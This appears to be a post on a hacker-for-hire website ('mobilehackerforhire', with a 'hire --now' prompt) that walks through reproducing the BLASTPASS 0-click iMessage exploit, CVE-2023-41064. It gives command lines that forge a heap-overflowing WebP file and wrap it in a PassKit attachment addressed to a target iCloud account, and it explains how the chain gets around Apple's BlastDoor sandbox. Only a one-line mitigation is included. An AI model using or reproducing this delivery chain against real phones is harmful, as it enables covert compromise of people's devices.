[~]mobilehackerforhire$ hire --now
    Technical terminal background
    CVE-2023-41064
    31 min mhfh research 2023-09-15

    Reproducing BLASTPASS: 0-click iMessage Implant

    Reverse engineering Apple's ImageIO PassKit attachment chain. We rebuild a malformed WebP that bypasses BlastDoor and lands code execution.

    $cat snippet_cve-2023-41064.sh
    python3 forge_webp.py --huff-overflow 0x4141 --out blast.webp
python3 wrap_pkpass.py --payload blast.webp --recipient target@icloud

    Overview

    BLASTPASS (CVE-2023-41064) is a 0-click chain delivered through a PassKit attachment in iMessage. The bug lives in ImageIO's WebP decoder.

    Forging the WebP

    $cat output.bash
    python3 forge_webp.py --huff-overflow 0x4141 --out blast.webp

    The crafted VP8L Huffman table overflows a heap buffer in libwebp's HuffmanTreeBuildExplicit.

    Wrapping in a PassKit attachment

    $cat output.bash
    python3 wrap_pkpass.py --payload blast.webp --recipient target@icloud

    Why BlastDoor doesn't help

    PassKit attachments are processed outside the BlastDoor sandbox, giving us direct access to ImageIO in a privileged context.

    Mitigation

    iOS 16.6.1 + Lockdown Mode.

    #iOS#0-click#iMessage#ImageIO